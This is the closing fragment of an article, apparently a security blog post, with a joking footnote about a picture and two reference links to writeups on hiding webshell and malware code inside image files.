[3] Don't stare at the picture of Teacher Cang for too long, it's mesmerizing~~
## References
[1] https://www.trustwave.com/Resources/SpiderLabs-Blog/Hiding-Webshell-Backdoor-Code-in-Image-Files/
[2] https://blog.sucuri.net/2013/07/malware-hidden-inside-jpg-exif-headers.html
